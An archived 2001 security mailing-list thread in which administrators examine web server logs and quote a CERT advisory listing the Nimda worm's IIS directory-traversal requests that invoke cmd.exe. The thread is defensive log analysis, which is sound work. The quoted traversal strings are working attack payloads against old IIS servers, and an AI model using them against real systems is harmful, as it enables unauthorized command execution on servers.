[Dshield] New one?

Stan Markham smarkham at ci.mesquite.tx.us
Thu Oct 18 13:01:13 GMT 2001


Sorry - fat fingers and no coffee.

from http://www.cert.org/advisories/CA-2001-26.html

The scanning activity of the Nimda worm produces the following log entries
for any web server listing on port 80/tcp:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy
stem32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

-----Original Message-----
From: Stan Markham [mailto:smarkham at ci.mesquite.tx.us]
Sent: Thursday, October 18, 2001 7:58 AM
To: 'dshield at dshield.org'
Subject: RE: [Dshield] New one?


Definitely not a 'one shot' attempt.  I've been seeing these on a daily
basis since early June,   right after being mentioned in cert.org's digest.
-----Original Message-----
From: dshield-admin at dshield.org [mailto:dshield-admin at dshield.org]On
Behalf Of Martin Mueller
Sent: Thursday, October 18, 2001 3:09 AM
To: dshield at dshield.org
Subject: Re: [Dshield] New one?


I am wondering why nobody else has sent any logs like this till now in this
mailinglist.
Perhaps it was a single try and a false alert.

Martin

Tony Maro schrieb:

> Oh crap - looks like it's trying the standard directory traversal with a
> twist, BUT... what's significant is that it looks like it's coming from a
> Winblows 98 box!
>
> If there's a new bug infecting 98 that does this that's gonna be one
massive
> DOS attack.
>
> -----Original Message-----
> From: Martin Mueller [mailto:mueller at webpartner.de]
> Sent: Wednesday, October 17, 2001 8:05 AM
> To: dshield at dshield.org
> Subject: [Dshield] New one?
>
> Hi all,
>
> this log-entrys i found today on a Apache virtual-Webserver of my company.
> Sorry, the lines are very long, but all different...
>
> Is this a new "Code Red" or something?
> It looks not like the "normal" CR or Nimda to me.
>
> The "Attacking-IP" is located in Brasil(if it is the real :-) ), we are in
> Germany.
>
> Best regards,
>
> Martin Mueller
> ----------------------------------------
> Webpartner Kommunikationsdienste GmbH
> Metzstrasse 14b
> 81667 Muenchen
>
> Tel: 089/480 88 89-0
> Fax: 089/480 88 89-9
>
> mueller at webpartner.de
> http://www.webpartner.de
> ----------------------------------------
> Schon geklickt? http://www.urlpartner.de
> Favoriten online verwalten
> Ein Projekt der Webpartner GmbH
>
> 200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
>
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winn
> t/system32/cmd.exe?/c%20dir%20c:\
> HTTP/1.1" 404 336 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)"
> 200.199.211.50 - - [17/Oct/2001:08:10:28 +0200] "GET
>
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
> nnt/system32/cmd.exe?/c%20dir%20c:\
>
> _______________________________________________
> Dshield mailing list
> Dshield at dshield.org
> To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield

--
Mit freundlichen Gruessen

Martin Mueller
----------------------------------------
Webpartner Kommunikationsdienste GmbH
Metzstrasse 14b
81667 Muenchen

Tel: 089/480 88 89-0
Fax: 089/480 88 89-9

mueller at webpartner.de
http://www.webpartner.de
----------------------------------------
Schon geklickt? http://www.urlpartner.de
Favoriten online verwalten
Ein Projekt der Webpartner GmbH


_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield




More information about the list mailing list